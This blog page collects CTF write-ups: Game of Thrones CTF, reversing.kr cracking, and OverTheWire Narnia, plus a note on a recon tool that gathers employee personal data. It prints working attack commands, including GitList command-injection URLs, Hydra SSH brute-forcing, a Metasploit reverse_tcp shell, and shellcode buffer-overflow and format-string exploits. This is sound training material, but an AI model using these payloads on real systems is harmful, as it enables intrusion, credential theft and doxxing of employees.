Game of Thrones CTF Write-Up

What follows is a write-up of a Capture The Flag (CTF) game, Game of Thrones 1.

The CTF has players find 11 flags, scattered throughout the Game of Thrones (GoT) world. Compromising applications, services, and breaking encryption is all part of the game.

I had a tremendous amount of fun completing this. Although the CTF might be somewhat easy for those who have, say, passed the OSCP, it is still a lot of fun. For those who are reading my blog as they prepare for the OSCP, this is a great way to train.

Thank you, v1s1t0r!

[*] Status: COMPLETED

Solution

Scan the network:
nmap -sS -Pn 192.168.121.120-140

Run an OS scan against the target:
nmap -sS -Pn -O 192.168.121.130

Check the web service:
Browse to: http://192.168.121.130

Check the source code:
Right-click -> View Page Source

Check the robots.txt file:
Browse to: http://192.168.121.130/robots.txt

There are multiple hints here. First, set the User-Agent to “Three-eyed-raven” and then explore the options.

Creating a new User Agent (UA):
Open User Agent Switcher -> New

Click “Ok”
Select the new UA -> Ok

Browse to the clue:
Browse to: http://192.168.121.130/the-tree/

Right-click -> View Page Source

We get several hints, including a username and potentially a password.

Search for the map:
Browse to: http://192.168.121.130/secret-island/

Click on “Map”

We now have the layout of how to approach this game, as well as clues.
Our first flag will be found via the FTP service, or Dorne.

Explore the third revealed URL:
Browse to: http://192.168.121.130/direct-access-to-kings-landing/
Right-click -> View Page Source

We already have the username for entry to Dorne. We are missing the password, which the savages hold, and the savages are related to the music found in the main page.

Inspecting the audio files:
wget http://192.168.121.130/music/game_of_thrones.mp3
exiftool game_of_thrones.mp3

Sweet! We found our first flag? Now we have to figure out what to do with it.

Savages secret flag: 8bf8854bebe108183caeb845c7676ae4

Search for more potentially hidden directories:
dirb http://192.168.121.130 -N 500 -S /usr/share/dirb/wordlists/big.txt

Discovered directories:
1) http://192.168.121.130/sitemap.xml
2) http://192.168.121.130/h/i/d/d/e/n/index.php

Exploring the “hidden” directory:
Browse to: http://192.168.121.130/h/i/d/d/e/n/index.php

Right-click -> View Page Source

We now have the full set of FTP credentials.

FTP Credentials:
oberynmartell : A_verySmallManCanCastAVeryLargeShad0w

Logging into Dorne (FTP service):
ftp 192.168.121.130

Sweet! Another flag!

Dorne Flag: fb8d98be1265dd88bac522e1b2182140

Investigating the server:
dir

Analyzing the two files:
file the_wall.txt.nc

cat problems_in_the_north.txt

Apparently we are going to have to crack the hash in order to decrypt the_wall.txt

A search on Google reveals the following:

We are going to have to use hashcat-legacy in order to crack the hash.

Cracking the hash:
echo “6000e084bf18c302eae4559d48cb520c:2hY68a” > hash
hashcat-legacy -m 3610 -a 0 hash /usr/share/wordlists/rockyou.txt

Password: stark

Decrypting the_wall.txt:
mcrypt -d the_wall.txt.nc

cat the_wall.txt

Sweet! We have access to a new area.
Since it is clearly giving us the path, it looks like we are going to have to edit our hosts file.

URL: http://winterfell.7kingdoms.ctf/——W1nt3rf3ll——
User: jonsnow
Pass: Ha1lt0th3k1ng1nth3n0rth!!!

Exploring Winterfell:
vi /etc/hosts

Browse to: http://winterfell.7kingdoms.ctf/——W1nt3rf3ll——/

Right-click -> View Page Source

Winterfell Flag: 639bae9ac6b3e1a84cebb7b403297b79

We get a flag, plus a couple of hints.

Exploring the clues:
Click on “../winterfell.css”

Download the “stark_shield.jpg”
strings index.jpeg

We have all the clues we need. The Iron Islands are touted as a DNS server, and so we must query the server’s DNS txt record to get to the next step.

Querying the DNS server:
nslookup -q=txt TimeF0rconqu3rs.7kingdoms.ctf 192.168.121.130

Excellent. We have another flag. We can also proceed to the next region!

Iron Islands Flag: 5e93de3efa544e85dcd6311732d28f95

Browsing to the Stormlands:
Browse to: http://192.168.121.130:10000/

Login

Enter ‘ in the search bar -> Click on “File Manager”

At first I thought about clicking away on the file system, but it was unresponsive. No matter. There are other ways to get the flag.

Searching for a Webmin exploit:
Search: webmin exploit
Read: https://www.exploit-db.com/exploits/21851/
Browse to: http://192.168.121.130:10000/file/show.cgi/home/aryastark/flag.txt

Sweet. We have another flag.

Stormlands Flag: 8fc42c6ddf9966db3b09e84365034357

We also get some hints:
The credentials to access to the Mountain and the Vale kingdom are:
user/pass: robinarryn/cr0wn_f0r_a_King-_
db: mountainandthevale

pgAdmin magic will not work. Command line should be used on that kingdom – Talisa Maegyr

Logging into the SQL database:
psql -h 192.168.121.130 mountainandthevale robinarryn

Listing the DB views:
\dv

Attempting to read flag contents:
select * from flag;

Elevating privileges:
grant all privileges on all tables in schema public to robinarryn;

Attempting to read the flag:

We get a base64-encoded string. Time to decode.

Decoding the base64-string:
echo “TmljZSEgeW91IGNvbnF1ZXJlZCB0aGUgS2luZ2RvbSBvZiB0aGUgTW91bnRhaW4gYW5kIHRoZSBWYWxlLiBUaGlzIGlzIHlvdXIgZmxhZzogYmIzYWVjMGZkY2RiYzI5NzQ4OTBmODA1YzU4NWQ0MzIuIE5leHQgc3RvcCB0aGUgS2luZ2RvbSBvZiB0aGUgUmVhY2guIFlvdSBjYW4gaWRlbnRpZnkgeW91cnNlbGYgd2l0aCB0aGlzIHVzZXIvcGFzcyBjb21iaW5hdGlvbjogb2xlbm5hdHlyZWxsQDdraW5nZG9tcy5jdGYvSDFnaC5HYXJkM24ucG93YWggLCBidXQgZmlyc3QgeW91IG11c3QgYmUgYWJsZSB0byBvcGVuIHRoZSBnYXRlcw==” | base64 –decode && echo ” ”

We get another flag, plus hints.

Kingdom of the Mountain and the Vale Flag: bb3aec0fdcdbc2974890f805c585d432

Hints:
User/pass combination: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah
First you must be able to open the gates.

Before proceeding, let us see if there are any other hints or flags in the database.

Listing DB tables:
\dt

The map shows a flag for the City of Braavos. So, let us see what the DB reveals.

Reading the braavos_book contents:
select * from braavos_book;

We get some sort of encrypted message:
Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu’c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc

Decoding the message:
Browse to: https://www.dcode.fr/vigenere-cipher
Paste the message
Select: Try to decrypt automatically (statistical analysis)
Click “Decrypt Vigenere”

Decoded message:
THE MANY FACED GOD WANTS YOU TO CHANGE YOUR FACE HE WANTS YOU TO IDENTIFY AS ONE OF YOUR KILL LIST SELECT IT BASED ON THIS BOOKS LOST PAGE NUMBER THE DATABASE TO CONNECT WILL BE BRAAVOS AND YOUR PASSWORD WILL BE VALARMORGHULIS

We have received many hints here. First, check the books contents again, then look for the missing number in the kill list. Finally, log in as that user to the Braavos database, with the password ValarMoghulis.

Re-examining the contents of books:

The missing number is: 5

Reading the kill list:
select * from aryas_kill_list;

The user is: TheRedWomanMelisandre

Database: braavos
User: TheRedWomanMelisandre
Password: ValarMorghulis

Logging into the Braavos database:
psql -h 192.168.121.130 braavos TheRedWomanMelisandre

Exploring the new database:
\dt

select * from temple_of_the_faceless_men;

City of Braavos Flag: 3f82c41a70a8b0cfec9052252d9fd721

Great! Time to continue with the main flags.

The service is imap and the hints are:

User/pass combination: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah
First you must be able to open the gates.

Since port 143 is closed, we need to open it. Here, we can use a technique called “port knocking”, where we attempt to connect to certain closed ports, hence knocking.

Ports to knock: 3487 64535 12345

Port knocking:
knock -v 192.168.121.130 3487:tcp 64535:tcp 12345:tcp
nmap 192.168.131.130 -p 143

Connecting to imap:
nc 192.168.121.130 143
? LOGIN olennatyrell@7kingdoms.ctf H1gh.Gard3n.powah
? LIST “” “*”
? Select Inbox
? FETCH 1 BODY[]

Sweet! We have another flag, as well as clues.

Kingdom of Reach Flag: aee750c2009723355e2ac57564f9c3db

The Rock (Port 1337) credentials:
User: TywinLannister
Pass: LannisterN3verDie!

Exploring The Rock (GitList):
Browse to: http://192.168.121.130:1337

casterly-rock -> note_under_the_bed.md

Decoding the string:
echo 2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874 | xxd -r -p

We need to access this file. However, we can’t simply paste the path and read the file.

Accessing the file:
Read: https://www.exploit-db.com/exploits/33929/

Browse to: http://192.168.121.130:1337/casterly-rock/blob/master/””`cat /home/tyrionlannister/checkpoint.txt`

We have to access King’s Landing from The Rock, or in other words, via the browser.

Accessing King’s Landing (MySQL):
Browse to: http://192.168.121.130:1337/casterly-rock/blob/master/””`mysql kingslanding -h 192.168.121.130 -ucerseilannister -p_g0dsHaveNoMercy_ -e ‘show tables;’`

Reading the iron_throne table:
Browse to: http://192.168.121.130:1337/casterly-rock/blob/master/””`mysql kingslanding -h 192.168.121.130 -ucerseilannister -p_g0dsHaveNoMercy_ -e ‘select * from iron_throne;’`

We get morse code.

Morse Code: -..-. . – -.-. -..-. — -.– … –.- .-.. -..-. ..-. .-.. .- –.

Decoding the string:
Browse to: https://www.dcode.fr/morse-code

Decoded string:

Attempting the flag:
Browsing directly to the flag does not work. Hence, we are going to have to modify the database in order to read the contents of the flag.

The iron_throne table provided a hint – We have certain privileges.

Checking our privileges:
Browse to: http://192.168.121.130:1337/casterly-rock/blob/master/””`mysql kingslanding -h 192.168.121.130 -ucerseilannister -p_g0dsHaveNoMercy_ -e ‘show grants for current_user;’`

We can privileges to insert and create. Perhaps we can create a new table, and then copy and read the flag there?

Creating a table and reading the flag:
Browse to: http://192.168.121.130:1337/casterly-rock/tree/master/””`mysql -h 192.168.121.130 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding -e “CREATE TABLE flag (flag VARCHAR(300));”`

Browse to: http://192.168.121.130:1337/casterly-rock/tree/master/””`mysql -h 192.168.121.130 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding -e “load data infile ‘/etc/mysql/flag’ into table flag;”`

Browse to: http://192.168.121.130:1337/casterly-rock/tree/master/””`mysql -h 192.168.121.130 -u cerseilannister -p_g0dsHaveNoMercy_ -D kingslanding -e “select * from flag;”`

Excellent! We have the last kingdom flag, as well as credentials for the final flag.

King’s Landing Flag: c8d46d341bea4fd5bff866a65ff8aea9

SSH Credentials:
User: daenerystargaryen
Pass: .Dracarys4thewin.

Exploring Dragonglass Mine (SSH):
ssh daenerystargaryen@192.168.121.130

Exploring the mine:
ls

cat checkpoint.txt

cat digger.txt

We get clues as to how to proceed. The talk of “root”, no “Fail2ban” magic, dragons, and the wordlist all hint at pivoting from the current SSH instance to root at the provided IP address using a brute-forcing method such as Hydra.

Brute-forcing the mine’s root password:
scp -p daenerystargaryen@192.168.121.130:/home/daenerystargaryen/digger.txt digger.txt
In one tab: ssh daenerystargaryen@192.168.121.130 -L 8888:172.25.0.2:22 -N
In another tab: hydra -l root -P digger.txt ssh://localhost:8888

Password: Dr4g0nGl4ss!

Pivoting to the mine’s root:
ssh root@127.0.0.1 -p 8888

Grabbing the mine (SSH) flag:
ls
cat flag.txt

DragonGlass Mine Flag: a8db1d82db78ed452ba0882fb9554fc9

Excellent! Time for the final battle.

SSH Credentials:
User: branstark
Pass: Th3_Thr33_Ey3d_Raven

Accessing the White Walkers (SSH):
ssh branstark@192.168.121.130

Exploring the area:

We are running a Docker system. Let’s look for docker privilege escalation exploits.

Searching for a Docker privilege escalation exploit:
Search: docker privilege escalation
Read: https://www.rapid7.com/db/modules/exploit/linux/local/docker_daemon_privilege_escalation

There is a Metasploit module for just what we are looking for.

Elevating privileges in Docker:
msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.121.130
set username branstark
set password Th3_Thr33_Ey3d_Raven
run
use exploit/linux/local/docker_daemon_privilege_escalation
set session 1
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.121.128
run

Investigating with root privileges:
cd /root
ls

cat checkpoint.txt

We get a pretty generous hint on how to proceed. We will need to download the final_battle file and see how we can use it.

Downloading the final_battle file and analyzing it:
download final_battle
file final_battle

Opening the file reveals it is password-protected and contains the final flag.
Our hints will help here.

Grabbing the password:
We will craft a Python script to reveal the password.
vi final_flag.py

python final_flag.py

Grabbing the final flag:

We have the final flag!

Final Battle Flag: 8e63dcd86ef9574181a9b6184ed3dde5

Time to decode the secret message.

Flags:
Dorne Flag: fb8d98be1265dd88bac522e1b2182140
Winterfell Flag: 639bae9ac6b3e1a84cebb7b403297b79
Iron Islands Flag: 5e93de3efa544e85dcd6311732d28f95
Stormlands Flag: 8fc42c6ddf9966db3b09e84365034357
Kingdom of the Mountain and the Vale Flag: bb3aec0fdcdbc2974890f805c585d432
Kingdom of Reach Flag: aee750c2009723355e2ac57564f9c3db
King’s Landing Flag: c8d46d341bea4fd5bff866a65ff8aea9
Savages Flag: 8bf8854bebe108183caeb845c7676ae4
City of Braavos Flag: 3f82c41a70a8b0cfec9052252d9fd721
DragonGlass Mine Flag: a8db1d82db78ed452ba0882fb9554fc9
Final Battle Flag: 8e63dcd86ef9574181a9b6184ed3dde5

Decoding the secret message:
Browse to: https://crackstation.net/
Enter the hashes in order.

Awesome! This CTF was a lot of fun. Major kudos to v1s1t0r!
If you read this write-up and didn’t follow along, I suggest you download the VM and give it a go! Come back when you get stuck.

Reversing.kr Write-Up

What follows is a write-up of a reverse engineering war game series, reversing.kr.

The war games have players reverse Windows, Linux, and macOS binaries. The players get a flag if they succeed in compromising the application.

Showing gratitude to the creators of the war game, I will abide by their rules and only publish the solution to those challenges that already have other solutions online. I will not post solutions to challenges that no one else has solved publicly.

[!] Friendly Warning: Some of the binaries are malicious. Some of these are: Easy Unpack, Ransomware, and Twist1. Do not run these binaries outside a sandbox.

[*] Status: IN-PROGRESS

Level 0: Easy Crack

Solution

Inspecting the file in Binary Ninja:

Initially I was going to use Binary Ninja to complete the challenge. However, as you can see, it shines very little light on the program. Hence, I decided to use IDA.

Inspecting the file with IDA:

Notice the push to the lpDialogFunc.

Inspecting lpDialogFunc:

The sub_401080 function might be interesting.

Inspecting the sub_401080 function:

Notice straightaway that we see the text “a5yR3versing”.
There’s a letter “E” missing in there somewhere.

The missing “E” can be found further below, in a comparison to its hex equivalent, 0x45.
It looks like I have the flag.

Flag: Ea5yR3versing

Proof:

 

Level 1: Easy Keygen

Instructions

Find the Name when the Serial is 5B134977135E7D13

Solution

Inspecting the file with IDA:

Note that there is an array of three integers (16, 32, 48), and that the username (input name) is eight (8) characters long.

Renamed for convenience:

loc_401077:
ESI is compared against 3.
If it’s less than three, it jumps to loc_40107E
If it’s greater than three, ESI is cleared by XOR.

ESI is clearly the counter that cycles through the three integers.

Throughout this process, the username is being XOR’ed against the three integers:
16, 32, and 48

Since the goal is to find the name given the serial number, we can use repeating-key XOR decryption using the integer array and the serial number to find the name.

Crafting the solution:

Getting the answer:
python keygen.py

Proof:

 

Level 2: Music Player

Instructions

This MP3 Player is limited to 1 minutes.
You have to play more than one minute.

There are exist several 1-minute-check-routine.
After bypassing every check routine, you will see the perfect flag.

Solution

Several clues are given right off the bat.

The goal: To bypass the 1-minute play limit.

To do this, we have to bypass “several” check routines.

Since the challenge does not provide any MP3 file, I searched for a random sample online.

Running the player:

The player pukes out an error, which is probably in Korean and is not displaying properly.

Inspecting the file with IDA:

0EA60H translates to 60000 (milliseconds), which translates to 60 seconds.
We have discovered the first check to bypass.

Further down, we find the following:

This looks like part of a flag?

The other check to bypass can be found further below:

We will bypass these by changing the instructions to simple JMP instructions.

Changing the instructions using Immunity Debugger:

Bypass the first check:

Bypass the second check:

Save the modified executable:

Right-click in the CPU pane -> Copy to executable -> All modifications
Right-click in the File pane -> Save file -> Name to whatever

Running the modified executable:

Flag: LIstenCare

Proof:

 

Level 3: Replace

Solution

Running the file:

The program crashes upon entering a number and hitting “Check”.

Inspecting the file with OllyDbg and IDA:

The challenge is titled “Replace”, and there are multiple references to a “Replace” function.
Just as in the previous challenges, this probably means we are going to have to modify instructions.

0040103D . 74 56 JE SHORT Replace.00401095

This jumps past the address which has the “Correct!” string.
So, it makes sense to follow the tip to replace that instruction.

Let’s NOP it.

Replacing 401095 with NOPs:
Double-click on 401095 -> Check “Fill with NOP’s” -> Enter “NOP” -> Assemble

Checking the program:
Enter “1” and press “Check”.

The program crashes, as expected.

Notice the value in EAX: 601605CC

Repeating the process with “2”, “3”, etc. reveals a pattern.

With 2: 
With 3:

Pattern:
601505CB + <Input> = EAX value

Whatever value is in EAX has two bytes overwritten by NOPs.
Coincidentally, the OPCODE for 0x401071, which jumps over the “Correct” section, is two bytes long.

The solution is to overwrite 0x401071, so we can slide into “Correct”.

The simple math behind the solution:
x + 601605CB = 401072
x = (401072 – 601605CB) + FFFFFFFF
x = A02A0AA6
x in decimal = 2687109798

Entering the result into the program:

Flag: 2687109798

Proof:

 

Level 4: ImagePrc

Solution

Running the file:

The program lets us draw and check if the drawing is the correct answer.

Inspecting the file with IDA Pro:

96h = 150 (height)
0C8h = 200 (width)

These are the height and width of the target BMP image.

We also see:

From this we know that the target image is 200×150, and that it is being loaded from the binary as a resource.

Creating an empty BMP file:

We save it as a 24-bit Bitmap file.

Inspecting the resource:

Pasting this should give us the answer.
Since it proved hard to copy the contents from IDA, I decided to use the ResourcesExtract software to extract the file.

Extracting the resource:

The extract gives us a manifest file. Opening the manifest file reveals that we have everything we need to solve the challenge.

Copying the resource contents using HxD:

Pasting the contents into the BMP file and saving:

Note that we replace everything but the header.

The modified file:

Flag: GOT

Proof:

 

Level 5: Position

Instructions

ReversingKr KeygenMe

Find the Name when the Serial is 76876-77776
This problem has several answers.

Password is ***p

Solution

Running the program:

The program takes in a name and a serial number (76876-77776).
We are provided with the serial number and have to find the name.
We know that the solution ends with the letter “p”.

Inspecting the binary with IDA Pro:

A call to loc_401CF0 determines the outcome – whether the inputs are correct or not.

This loop checks for the first four characters of the name being lowercase letters (a-z).

Several checks follow:
First, the program checks for the letters in the name being different.
Second, it checks for the serial being 11 characters long, and the fifth character being “-“.
Finally, a lengthy comparison routine occurs which leads to our solution.

The lengthy routine seems complicated at first, but is actually quite simple as long as you keep track of assignments.

CString Reference:
GetAt: https://msdn.microsoft.com/en-us/library/aa314338(v=vs.60).aspx
GetBuffer: https://msdn.microsoft.com/en-us/library/aa314880(v=vs.60).aspx

The easiest way to solve this is to write code as we read along.

Translation of Assembly to Python:

Running the solution program:

Since we know the password ends with “p”, the following are the possible options:
bump
cqmp
ftmp
gpmp

Flag: bump

Proof:

 

Level 6: Direct3D_FPS

Solution

This time we are playing a First Person Shooter (FPS), where we get to kill, or rather get killed, by enemies.

Inspecting the binary with IDA Pro:

This is the function that is triggered when we win the game. It outputs the flag, which starts at byte_407028.
We can confirm this is true by also looking at the binary in Immunity Debugger, as seen below.

Reading the flag and measuring it:
Ctrl-C the flag in Immunity Debugger.
Open a terminal and use Python to measure the length of the encrypted flag.

We can see that the flag is encrypted, and that it is 50 bytes in size.

Checking cross-references to the flag:
Ctrl-X to list cross-references.

Analyzing the function that references the flag:

The function performs the following calculation for each character in the flag:
xor_offset + (char * 0x210)
char_offset ^ xor_offset

Where:
xor_offset = 409184 + char
char_offset = 407028 + char

To be able to solve this it is necessary to set a breakpoint and run the program in a debugger.
We can do all of this within IDA.

Setting the breakpoint:
Set a breakpoint at: mov dword_CC9194[ecx], 0

Now we have to run the program and commit suicide. We hit the breakpoint when we commit suicide, as our HP hits 0.

Running the program and executing our code:
Choose a debugger in IDA -> Hit the “Play” icon.
Commit suicide in the game by running into an enemy and staying there until HP hits zero.

Run the following Python code within IDA:
xor_offset = <TBD>
char_offset = <TBD>
print bytearray([(Byte(char_offset + i) ^ Byte(xor_offset + (i * 0x210)) ) for i in range(50)])

In my case:
char_offset = 0xCC7028
xor_offset = 0xCC9184

Flag: Thr3EDPr0m

Proof:

 

Level 7: Easy ELF

 

Solution

Run the program:
chmod u+x Easy_ELF
gdb -q ./Easy_ELF
r

Analyzing the program in Binary Ninja:

We can see that the functions that determine the outcome are sub_8048434 and sub_8048451.

Analyzing sub_8048434:

No checks here. Moving on.

Analyzing sub_8048451:

Translation:
first_char ^ 34
second_char = 31
third_char ^ 32
fourth_char ^ ffffff88
fifth_char = 58

Translation:
third_char = 7c
first_char = 78
fourth_char = dd

Solution:
78 ^ 34
second_char = 31
7c ^ 32
dd ^ 88
fifth_char = 58

Crafting the solution:
vi easy_elf.py

Solving the challenge:
python easy_elf.py

Flag: L1NUX

Proof:

 

Level 8: WindowsKernel

Instructions

Please authenticate to lowercase.

Solution

…

PreEx: Pre-Exploitation Intelligence Gathering

I have recently been working on PreEx, a pre-exploitation intelligence gathering program.

My goal with PreEx is to make it easier to gather all the information necessary in order to launch a targeted attack. In combination with other tools such as Tuoni and Cryptan, PreEx can be used to better fingerprint targets and carry out attacks more efficiently.

The use of this tool is to be limited to testing purposes under legal authority.

The current version of PreEx is version 0.

Current capabilities:
* Organization email addresses
* Organization hostnames-IPs
* Target Phone numbers
* Employee social media profiles
* Target Social media profiles
* Current and past addresses
* DNS information
* Registered domain holder information
* SNMP device enumeration
* Samba device enumeration

Future capabilities:
* Relevant contacts
* Events to attend
* Locations visited
* Interests
* Operating System used
* Software used

More functionalities and capabilities will be added in the future.

 

 

OverTheWire – Narnia Write-Up

What follows is a write-up of a binary exploitation war game, OverTheWire Behemoth.

The war game introduces players to the basics of binary exploitation. Players get to exploit vulnerabilities such as plain vanilla buffer overflows, shellcode injection via environment variables, and more.

[*] STATUS: COMPLETED

Level 0

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia0

Notice that there is a 20-byte buffer, and that if we enter 0xdeadbeef we get a shell.

Performing a buffer overflow to get a shell:
python -c “print (‘a’ * 20) + ‘\xef\xbe\xad\xde\x88′”
./narnia0

Grabbing the flag:
cat /etc/narnia_pass/narnia1

Flag: efeidiedae

Techniques used: Local buffer overflow

 

Level 1

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia1.c

Notice the line: ret = getenv(“EGG”)
What this means is we have to set an environment variable titled “EGG” and pass it shell-spawning shellcode.

Setting the environment variable:
export EGG=$’\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80′

Running the binary:
./narnia1

Grabbing the flag:
cat /etc/narnia_pass/narnia2

Flag: nairiepecu

Techniques used: Environment variable overwrite

 

Level 2

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia2.c

Notice the 128-byte buffer. The solution is another buffer overflow.

Determining the offset to control the Extended Instruction Pointer (EIP):
gdb -q ./narnia2
r $(python -c “print (‘a’ * 140) + (‘b’ * 4)”)

We have correctly determined the offset, which is evidenced by the program crashing with our b’s.
The total size of the exploit will be 144 bytes.

We now have to insert the shellcode and determine an address that will point back to the start of our shellcode.
Since our shellcode is 25 bytes long, we will  pad our exploit with 115 characters, followed by the shellcode and four b’s. The four b’s will serve as a check that we still control EIP.

Seeking the correct address to jump back to the shellcode:
r $(python -c “print (‘a’ * 115) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘b’ * 4)”)

x/150x $esp

Notice that after examining 150 words (four bytes per word) into ESP, we can see the start of our shellcode.
To be on the safe side and ensure that the full shellcode is run, we will select 0xffffd880 as our address to jump back to.
We will replace the four b’s with the address to jump back to.

Testing the exploit:
r $(python -c “print (‘a’ * 115) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘\x80\xd8\xff\xff’)”)

Success. Time to run the exploit outside GDB.

Running the exploit:
./narnia2 $(python -c “print (‘a’ * 115) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘\x80\xd8\xff\xff’)”)

Grabbing the flag:

Flag: vaequeezee

Techniques used: Local buffer overflow

 

Level 3

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia3.c

The goal is to copy the contents of ifile (which will have the password to the next level) to ofile, which will be a file we can read.

We will be using a combination of buffer overflow with symbolic links.

Creating our flag container:
touch /tmp/narnia4_pass

Creating directories that will perform the buffer overflow:
cd /tmp
cd ./$(python -c “print ‘A’ * 27”)

The buffer is 32-bytes big, and so 27 A’s plus /tmp/ == 32
This allows us to overwrite the ofile and set it to any path we want

Creating the symbolic link between the real flag file and a second flag container:
ln -s /etc/narnia_pass/narnia4 ./narnia4_pass

This second flag container and the whole directory structure is done simply to cause an overflow. When we run the program, the first flag container (/tmp/narnia_pass) will be the file where the original file will be copied to.

Running the program to perform the copy operation:
/narnia/narnia3 $(python -c “print (‘/tmp/’) + (‘A’ * 27) + (‘/tmp/narnia4_pass’)”)

Reading the contents of our flag container:
cat /tmp/narnia4_pass

Flag: thaenohtai

Techniques used: Local buffer overflow via directory structure; symbolic links

 

Level 4

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia4.c

Notice that this will be another simple buffer overflow challenge.
strcpy copies whatever we pass to the application as arguments into the buffer.
Hence, we just have to overflow the buffer and use some shellcode to gain a shell.

Determining the offset to control the Extended Instruction Pointer (EIP):
gdb -q ./narnia4
r $(python -c “print (‘a’ * 270) + (‘b’ * 4)”)

We almost gained control of EIP on the first shot. Let’s readjust and confirm control.

Readjusting to gain control of EIP:
r $(python -c “print (‘a’ * 272) + (‘b’ * 4)”)

Excellent. Time to put in the shellcode and determine the return address.

Seeking the correct address to jump back to the shellcode:
r $(python -c “print (‘a’ * 247) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘b’ * 4)”)

x/300x $esp

Notice that after examining 300 words into ESP, we can see the start of our shellcode.
To be on the safe side and ensure that the full shellcode is run, we will select 0xffffd880 as our address to jump back to.
We will replace the four b’s with the address to jump back to.

Testing the exploit:
r $(python -c “print (‘a’ * 247) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘\x80\xd8\xff\xff’)”)

Success. Let’s run the exploit outside of GDB now.

Running the exploit:
./narnia4 $(python -c “print (‘a’ * 247) + (‘\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80’) + (‘\x80\xd8\xff\xff’)”)

Grabbing the flag:
cat /etc/narnia_pass/narnia5

Flag: faimahchiy

Techniques used: Local buffer overflow

 

Level 5

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia5.c

Notice no format parameter was included for the function snprintf().
For this challenge we will do attack.

Notice that the goal is to make i be 500. We will use format specifiers to achieve this goal.

Key specifiers:
%x    : To print hex values
%n    : To write the amount of characters printed so far
.    : To ensure integers (written in decimal)

Determining where our input starts:
gdb -q ./narnia5
r $(python -c “print (‘A’ * 4) + (‘%x’ * 5)”)

Input address: 0xffffd6bc

Testing the format string attack in GDB:
r $(python -c ‘print(“\xbc\xd6\xff\xff”)’)%.496x%5\$n

Success. Time to run the exploit.

Running the exploit:
./narnia5 $(python -c ‘print(“\xcc\xd6\xff\xff”)’)%.496x%5\$n

Grabbing the flag:
cat /etc/narnia_pass/narnia6

Flag: neezocaeng

Techniques used: Format string attack

 

Level 6

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia6.c

Notice that we have two 8-byte buffers.
Also notice the inclusion of stdlib.
For this challenge, we will attempt a return-to-lib (ret2lib) attack.

Since stdlib includes everything (meaning it also includes system), we can return to the library and have system run /bin/sh

Testing the theory in GDB:
gdb -q ./narnia6
br *main
r aaaa bbbb
p system

Address of system: 0xf7e60e70

We have all the information we need to run the attack.
Since the program takes two arguments, we will run two Python instances.

Running the exploit:
./narnia6 $(python -c “print (‘a’ * 8) + ‘\x70\x0e\xe6\xf7′”) $(python -c “print (‘a’ * 8) + ‘/bin/sh'”)

Grabbing the flag:
cat /etc/narnia_pass/narnia7

Flag: ahkiaziphu

Techniques used: Return-to-lib (ret2lib)

 

Level 7

Solution:

Check out the source code:
cd /narnia/
ls -la
cat narnia7.c

The goal is to overwrite goodfunction() with hackedfunction().
We will attempt to do a format string attack.

Running the program in GDB:
gdb -q ./narnia7
r a

ptrf()             = 0x80486e0 (0xffffd62c)
goodfunction()     = 0x80486e0
hackedfunction()     = 0x8048706

Determining our offset:
disas vuln
br *vuln+190
r bbbb

Offset: 6

Running a test with %x also confirms that the program possesses format string vulnerabilities.

We will use the “Magic Formula” to calculate our format string exploit.

As seen above, the formula works by splitting the target four bytes into two chunks (two high-order bytes and two low-order bytes), and using the #$ and %hn tokens to place the values in the right place.

By leveraging this formula, we can pick specific memory locations within the application and overwrite values.

I learned about this formula thanks to Daniel Regalado and his book: Gray Hat Hacking (Fourth Edition).

Using the formula:
Addresses:
ptrf()             = 0x80486e0 (0xffffd62c)
goodfunction()     = 0x80486e0
hackedfunction()     = 0x8048706

Calculations:
[addr + 2][addr]     = 0xffffd62c + 2                 = \x2e\xd6\xff\xff\x1c\xd6\xff\xff
%.[HOB – 8]x         = 0x0804 – 8 = 7FC(2044)         = %.2044x
%[offset]$hn                                     = %6\$hn
%.[LOB – HOB]x       = 0x8706 – 0804 = 7F02(32514)     = %.32514x
%[offset + 1]$hn                                 = %7\$hn

Running the exploit:
./narnia7 $(python -c’print(“\x2e\xd6\xff\xff\x1c\xd6\xff\xff”)’)%.2044x%6\$hn%.32514x%7\$hn

Grabbing the flag:
cat /etc/narnia_pass/narnia8

Flag: mohthuphog

Techniques used: Format String Attack Magic Formula

 

Level 8

Solution:

Check out the source code:
cd /narnia/
ls -la
